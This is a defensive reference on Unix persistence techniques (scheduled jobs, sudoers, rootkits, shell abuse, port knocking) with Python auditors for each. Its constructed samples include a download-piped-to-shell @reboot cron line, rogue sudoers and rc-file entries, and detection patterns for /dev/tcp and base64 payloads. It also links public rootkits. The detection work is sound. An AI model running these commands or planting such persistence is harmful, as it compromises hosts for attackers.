There are a number of systems on Unix-like hosts that may be abused by malware to maintain persistence on a host.
MITRE maintains comprehensive lists of Linux and MacOS persistence mechanisms.
Scheduled Jobs
There are many ways to schedule jobs on *nix systems. All of these schedulers may be abused as persistence mechanisms.
| Method | Operating System | Notes |
| --- | --- | --- |
| cron | all | https://crontab.guru |
| at | all | |
| systemd timers | Linux | https://wiki.archlinux.org/index.php/Systemd/Timers, https://opensource.com/article/20/7/systemd-timers |
| periodic | FreeBSD | https://www.freebsddiary.org/periodic.php |
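Reviewing scheduled jobs is mostly a matter of parsing the crontab format and asking a few questions of each command. The following is an added example, not code from the original page: it parses system-crontab lines (the format with a user field, as in /etc/crontab and /etc/cron.d/*) and flags entries that run from world-writable directories, pipe a download into a shell, decode an embedded payload, or fire at every boot. The sample crontab, the directory list and the patterns are constructed here for illustration and are not from the page.

```python
import re
import shlex

# Constructed sample in /etc/crontab format (a user field before the command).
# Not taken from the page: the first lines mimic a stock Debian crontab and the
# remaining ones are the kind of entries a defender would want reported.
SAMPLE_SYSTEM_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 * * * *     www-data /tmp/.x/update.sh
@reboot         nobody  curl -s http://203.0.113.9/p | sh
0 3 * * *       backup  /usr/local/bin/backup.sh --all
"""

# Directories any local user can write to: a scheduled command living there is
# more likely a dropped payload than packaged software.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Command-line shapes worth a second look, each with the reason it is reported.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "download piped to a shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode)"), "decodes an encoded payload"),
    (re.compile(r"/dev/tcp/"), "uses bash network redirection"),
]

ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def parse_crontab(text, system=True):
    """Return one dict per job line: line number, schedule, user (system crontabs only), command."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGNMENT_RE.match(line):
            continue  # blank, comment, or environment assignment such as SHELL=/bin/sh
        nsched = 1 if line.startswith("@") else 5      # @reboot-style shortcuts are a single field
        nfields = nsched + (1 if system else 0)        # system crontabs carry a user field
        parts = line.split(None, nfields)
        if len(parts) <= nfields:
            continue  # malformed: no command after the schedule/user fields
        entries.append({
            "line": lineno,
            "schedule": " ".join(parts[:nsched]),
            "user": parts[nsched] if system else None,
            "command": parts[-1],
        })
    return entries


def audit_crontab(text, system=True):
    """Return the parsed entries that trip at least one heuristic, with the reasons attached."""
    findings = []
    for entry in parse_crontab(text, system):
        cmd = entry["command"]
        try:
            tokens = shlex.split(cmd)
        except ValueError:          # unbalanced quotes; fall back to a plain split
            tokens = cmd.split()
        reasons = [f"executes from {d}"
                   for d in WORLD_WRITABLE_DIRS
                   if any(tok.startswith(d) for tok in tokens)]
        reasons += [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(cmd)]
        if entry["schedule"] == "@reboot":
            reasons.append("runs at every boot (@reboot)")
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_SYSTEM_CRONTAB):
        print(f"line {f['line']} ({f['user']}): {f['command']}\n    " + "; ".join(f["reasons"]))
```

Per-user crontabs (from crontab -l or /var/spool/cron) have no user field, so call audit_crontab(text, system=False) for those. The heuristics are deliberately narrow; the more reliable control is a baseline of the known-good job lines compared on every run, with any difference reviewed.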
Startup Scripts
*nix systems provide convenient methods to execute code when a system boots. Attackers can abuse this functionality to maintain persistence on a host.
sudo
sudo is a program that enables system administrators to grant users the ability to execute commands as another user. Most often, sudo is used to allow a regular user to execute commands as root. Attackers may abuse existing sudo configurations or add their own entries to sudoers (sudo's configuration files) as a persistent method of elevating their privileges.
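A sudoers review comes down to reading each rule as "who may run what, as whom, with which tags" and comparing it with what the host is supposed to allow. The example below is added here and is not from the page or from the sudo project: it parses plain user-specification lines (Defaults, alias definitions and include directives are skipped), then reports rules for principals outside a baseline, rules tagged NOPASSWD, rules granting ALL commands, and rules whose permitted binaries are editors or interpreters that can hand back an interactive shell. The sample sudoers text, the baseline set and the shell-capable list are constructed assumptions for illustration.

```python
import os
import re

# Constructed sample sudoers content (not from the page).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
deploy          ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
www-data        ALL=(ALL) NOPASSWD: ALL
backup          ALL=(root) NOPASSWD: /usr/bin/vim, /usr/bin/rsync
"""

# Assumed baseline: the principals this host is expected to have rules for.
BASELINE_PRINCIPALS = {"root", "%sudo", "deploy"}

# Binaries that can spawn a shell or run arbitrary code when allowed via sudo.
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "find", "awk",
                 "python3", "perl", "bash", "sh"}

# who  hosts=(runas) [TAG: ...] commands
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")
SKIP_RE = re.compile(r"^(Defaults\b|(User|Runas|Host|Cmnd)_Alias\b)")


def parse_sudoers(text):
    """Return one dict per user-specification rule; other line types are skipped."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments (and #include lines)
        if not line or SKIP_RE.match(line):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), []
        while True:                              # peel leading tags such as NOPASSWD:
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        rules.append({
            "line": lineno,
            "who": m.group("who"),
            "hosts": m.group("hosts"),
            "runas": m.group("runas") or "root",   # sudo's default target user
            "tags": tags,
            "commands": [c.strip() for c in rest.split(",") if c.strip()],
        })
    return rules


def audit_sudoers(text, baseline=BASELINE_PRINCIPALS):
    """Return rules that deserve review, each with a list of reasons."""
    findings = []
    for rule in parse_sudoers(text):
        reasons = []
        if rule["who"] not in baseline:
            reasons.append("principal not in baseline")
        if "NOPASSWD" in rule["tags"]:
            reasons.append("no password required")
        if "ALL" in rule["commands"] and rule["who"] not in baseline:
            reasons.append("unrestricted command set")
        shells = sorted({os.path.basename(c.split()[0]) for c in rule["commands"]
                         if os.path.basename(c.split()[0]) in SHELL_CAPABLE})
        if shells:
            reasons.append("command can spawn a shell: " + ", ".join(shells))
        if reasons:
            findings.append({**rule, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['who']} -> {f['commands']}  [{'; '.join(f['reasons'])}]")
```

On a real host, run the same audit over /etc/sudoers and every file in /etc/sudoers.d, since a dropped file in that directory is the least visible place to add a rule. This parser ignores alias expansion and escaped commas, so treat it as a first pass rather than a substitute for visudo -c and a manual read of anything it does not recognise.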
ssh
ssh is the most popular method of remotely administering Unix-like systems. As such, it is a popular choice for attackers to abuse to maintain persistence on a host.
Abusing Accounts
Attackers often abuse accounts to maintain access. Credentials may be obtained by an attacker in a variety of ways:
| Method | Notes |
| --- | --- |
| Default credentials | https://github.com/droberson/rtfm/blob/master/defaults.md |
| Cracking hashes | |
| Brute force | |
| Spraying | |
| Sniffing | |
| Social engineering | |
| Creating rogue accounts | |
Rootkits
Rootkits are malware that maintain access to a system by hiding an attacker's presence. This is typically done by means of a malicious kernel module, by abusing the dynamic linker (LD_PRELOAD, DYLD_INSERT_LIBRARIES), or by replacing userland software with malicious code.
Here are some examples of publicly available rootkits for Unix-like systems.
| Rootkit | Operating System | Notes |
| --- | --- | --- |
| Reptile | Linux | https://github.com/f0rb1dd3n/Reptile |
| vlany | Linux | https://github.com/mempodippy/vlany |
| FreeBSD Rootkit | FreeBSD | https://github.com/chkyass/Freebsd-Rootkit |
| Nuk3Gh0st | Linux | https://github.com/ropch4ins/Nuk3Gh0st |
| Jynx2 | Linux | https://github.com/chokepoint/Jynx2 |
| rkorova | Linux | https://github.com/nopn0p/rkorova |
| Azazel | Linux | https://github.com/chokepoint/azazel |
| Z34107 | Linux | https://github.com/qunxyz/Z34107 |
| inficere | MacOS | https://github.com/enzolovesbacon/inficere |
| Vixen | Solaris | https://github.com/patrobinson/Vixen |
Malicious Software Modules
Many advanced pieces of software provide a means to load modules that extend their functionality. This functionality can be abused to load malicious modules that provide an attacker with illicit access to a system.
| Malicious Module | Software | Notes |
| --- | --- | --- |
| apache-rootkit | Apache | https://github.com/ChristianPapathanasiou/apache-rootkit |
| mod-rootme | Apache | https://github.com/sajith/mod-rootme |
| MySQL User-Defined Functions | MySQL | https://www.exploit-db.com/papers/44139 |
Abusing Shell Functionality
Shells can be abused in a number of ways to maintain persistence on a host.
| Method | Notes |
| --- | --- |
| profiles and rc files | |
| traps | https://bash.cyberciti.biz/guide/Trap_statement |
| PATH hijacking | |
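The dynamic-linker abuse mentioned under Rootkits and the shell tricks in the table above share a common trait: they live in a handful of small text files and environment variables that can be checked quickly. The example below is added here and is not from the page; it audits, from constructed inputs, the preload variables in a process environment, the contents of /etc/ld.so.preload, each PATH entry (relative or world-writable entries), and a shell rc file for aliases or functions that redefine core tools, traps on shell events, and files sourced from world-writable locations. The sample environment, the preload file text, the rc file and the tool list are constructed assumptions, not data from the page.

```python
import re

# Constructed inputs (not from the page): what an auditor might collect from a
# host with a preloaded library, a tampered PATH and a modified ~/.bashrc.
SAMPLE_ENV = {
    "HOME": "/home/alice",
    "LD_PRELOAD": "/tmp/.x/libc.so.6",
    "PATH": ".:/tmp/bin:/usr/local/bin:/usr/bin:/bin",
}
SAMPLE_LD_SO_PRELOAD = "/usr/local/lib/libsample-preload.so\n"
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
alias sudo='/tmp/.x/sudo'
trap '/tmp/.x/beacon' DEBUG
. /tmp/.x/env.sh
"""

WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Variables the dynamic linker honours on Linux (LD_*) and macOS (DYLD_*).
PRELOAD_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH")
# Tools whose output or input an intruder would most want to intercept from an rc file.
CORE_TOOLS = {"ls", "ps", "top", "netstat", "ss", "lsof", "find", "sudo", "ssh", "cat", "who", "last"}

ALIAS_RE = re.compile(r"^\s*alias\s+([\w.-]+)=")
FUNC_RE = re.compile(r"^\s*(?:function\s+)?([\w.-]+)\s*\(\)\s*\{?")
TRAP_RE = re.compile(r"^\s*trap\s+.*\b(DEBUG|EXIT|ERR|RETURN)\b")
SOURCE_RE = re.compile(r"^\s*(?:\.|source)\s+(\S+)")


def audit_env(env):
    """Report any linker preload/search-path variable present in the environment."""
    return [("env", f"{var} is set: {env[var]}") for var in PRELOAD_VARS if env.get(var)]


def audit_ld_so_preload(text):
    """Every non-comment line of /etc/ld.so.preload is injected into every dynamic binary."""
    libs = [l.strip() for l in text.splitlines() if l.strip() and not l.startswith("#")]
    return [("ld.so.preload", f"library preloaded system-wide: {lib}") for lib in libs]


def audit_path(path):
    """Flag PATH entries that resolve relative to the cwd or sit in world-writable dirs."""
    findings = []
    for entry in path.split(":"):
        if entry in ("", ".") or not entry.startswith("/"):
            findings.append(("PATH", f"relative entry {entry!r} resolves against the current directory"))
        elif entry.startswith(WORLD_WRITABLE_DIRS):
            findings.append(("PATH", f"world-writable location on PATH: {entry}"))
    return findings


def audit_rc(text):
    """Flag rc-file lines that shadow core tools, install traps, or source world-writable files."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ALIAS_RE.match(line) or FUNC_RE.match(line)
        if m and m.group(1) in CORE_TOOLS:
            findings.append(("rc", f"line {lineno}: {m.group(1)} is redefined"))
        if TRAP_RE.match(line):
            findings.append(("rc", f"line {lineno}: trap handler on a shell event"))
        m = SOURCE_RE.match(line)
        if m and m.group(1).startswith(WORLD_WRITABLE_DIRS):
            findings.append(("rc", f"line {lineno}: sources {m.group(1)}"))
    return findings


def audit_host(env, ld_so_preload_text, rc_text):
    """Combine the four checks into one list of (source, reason) pairs."""
    return (audit_env(env)
            + audit_ld_so_preload(ld_so_preload_text)
            + audit_path(env.get("PATH", ""))
            + audit_rc(rc_text))


if __name__ == "__main__":
    for source, reason in audit_host(SAMPLE_ENV, SAMPLE_LD_SO_PRELOAD, SAMPLE_BASHRC):
        print(f"[{source}] {reason}")
```

In practice the inputs come from the environment of a running process (/proc/PID/environ on Linux), the real /etc/ld.so.preload (a kernel-module rootkit may hide it, so compare what open() returns with what a different tool or a boot from rescue media shows), and every rc file for every account, including system-wide ones under /etc. Note that a sourced file is a second place to look: the rc file itself may be clean and the sourced file not.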
External Services
Attackers often abuse the functionality of legitimate services, leverage bugs in these services, add backdoor code to a service, or create their own services with the intent of maintaining access to a host.
Web Shells
Web servers execute server-side code by design. Naturally, attackers have created web-based shells that abuse this functionality.
Traffic Signalling
An attacker sends a magic packet, or a specific sequence of packets, to a host; a backdoor on the host recognises the signal and grants access to the system.
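The defensive angle on traffic signalling is that the signal has to cross the network, so it shows up in firewall logs even when the backdoor itself is hidden: a single source hitting several closed ports within seconds, followed shortly by an accepted connection, is the classic shape of a knock sequence. The example below is added here and is not from the page; it parses constructed, iptables-style kernel log lines, groups DROP events by source address, finds runs of at least min_ports distinct ports inside a short window, and records whether an ACCEPT from the same source followed. The log lines, field layout, window sizes and addresses are all assumptions made for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed log excerpt in the style of iptables LOG output (not from the page).
SAMPLE_FIREWALL_LOG = """\
Jan 10 12:00:01 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.5 LEN=60 PROTO=TCP SPT=40001 DPT=7000
Jan 10 12:00:02 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.5 LEN=60 PROTO=TCP SPT=40002 DPT=8000
Jan 10 12:00:03 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.5 LEN=60 PROTO=TCP SPT=40003 DPT=9000
Jan 10 12:00:05 gw kernel: ACCEPT IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.5 LEN=60 PROTO=TCP SPT=40004 DPT=22
Jan 10 12:00:07 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.33 DST=203.0.113.5 LEN=60 PROTO=TCP SPT=51000 DPT=445
Jan 10 12:03:40 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.33 DST=203.0.113.5 LEN=60 PROTO=TCP SPT=51001 DPT=3389
"""

# Tolerates an optional "[uptime]" bracket after "kernel:" as real logs carry one.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+kernel:\s+(?:\[[^\]]*\]\s*)?"
    r"(?P<action>DROP|ACCEPT)\b.*?\bSRC=(?P<src>\S+).*?\bDPT=(?P<dpt>\d+)")


def parse_log(text):
    """Return (timestamp, src, action, dport) tuples sorted by time; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog stamps carry no year
        events.append((ts, m.group("src"), m.group("action"), int(m.group("dpt"))))
    events.sort(key=lambda e: e[0])
    return events


def detect_knock_sequences(text, window_s=10, min_ports=3, follow_s=30):
    """Find sources that hit min_ports distinct dropped ports within window_s seconds.

    Each finding records the port order, the time the run started, and the first
    port that was ACCEPTed from the same source within follow_s seconds afterwards.
    """
    by_src = defaultdict(list)
    for ts, src, action, dpt in parse_log(text):
        by_src[src].append((ts, action, dpt))

    findings = []
    for src, evs in by_src.items():
        drops = [(ts, dpt) for ts, act, dpt in evs if act == "DROP"]
        accepts = [(ts, dpt) for ts, act, dpt in evs if act == "ACCEPT"]
        i = 0
        while i < len(drops):
            j, ports = i, []
            # extend the window from drops[i] and collect distinct ports in order of first hit
            while j < len(drops) and (drops[j][0] - drops[i][0]).total_seconds() <= window_s:
                if drops[j][1] not in ports:
                    ports.append(drops[j][1])
                j += 1
            if len(ports) >= min_ports:
                end_ts = drops[j - 1][0]
                followed = next((dpt for ts, dpt in accepts
                                 if 0 <= (ts - end_ts).total_seconds() <= follow_s), None)
                findings.append({
                    "src": src,
                    "ports": ports,
                    "start": drops[i][0].strftime("%H:%M:%S"),
                    "accepted_port_after": followed,
                })
                i = j            # do not re-report the same run from a later start point
            else:
                i += 1
    return findings


if __name__ == "__main__":
    for f in detect_knock_sequences(SAMPLE_FIREWALL_LOG):
        print(f"{f['src']} knocked {f['ports']} at {f['start']}; accepted afterwards on port {f['accepted_port_after']}")
```

A fast port scan also produces several dropped ports inside the window, so the accepted_port_after field is the discriminator worth alerting on: a scan is usually not followed by a successful connection from the same source seconds later, while a knock sequence exists precisely to produce one. Tune window_s and min_ports to the firewall's logging rate, and remember that a signalling backdoor built on raw packet capture may respond to traffic the firewall never logs.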